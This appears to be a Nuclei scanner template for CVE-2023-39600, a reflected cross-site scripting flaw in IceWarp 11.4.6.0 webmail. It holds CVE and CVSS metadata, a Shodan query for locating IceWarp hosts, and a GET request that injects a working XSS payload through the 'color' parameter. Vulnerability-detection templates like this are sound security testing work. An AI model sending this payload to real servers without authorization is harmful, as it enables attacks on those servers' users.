nuclei-templates/http/cves/2023/CVE-2023-39600.yaml

52 lines
1.6 KiB
YAML

id: CVE-2023-39600
info:
name: IceWarp 11.4.6.0 - Cross-Site Scripting
author: Imjust0
severity: medium
description: |
IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
reference:
- https://medium.com/@katikitala.sushmitha078/cross-site-scripting-reflected-xss-in-icewarp-server-cve-2023-39600-310a7e1c8817
- https://nvd.nist.gov/vuln/detail/CVE-2023-39600
- https://icewarp.com
- https://medium.com/%40katikitala.sushmitha078/cross-site-scripting-reflected-xss-in-icewarp-server-cve-2023-39600-310a7e1c8817
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-39600
cwe-id: CWE-79
epss-score: 0.00064
epss-percentile: 0.26607
cpe: cpe:2.3:a:icewarp:icewarp:11.4.6.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: icewarp
product: icewarp
shodan-query: title:"icewarp"
tags: cve,cve2023,icewarp,xss
http:
- method: GET
path:
- '{{BaseURL}}/webmail/?color="><img src=x onerror=confirm(document.domain)>'
matchers-condition: and
matchers:
- type: word
words:
- "<img src=x onerror=confirm(document.domain)>"
- "IceWarp"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4b0a00483046022100a484819516e5aca8e6bf362a9641b1efd9af344e3fdb4c0d9fc8e6ffb2717fdd022100aba6198c3aad7db8646c920413213ed9e5ac7357401a1a4395b141205f5fad54:922c64590222798bb761d5b6d8e72950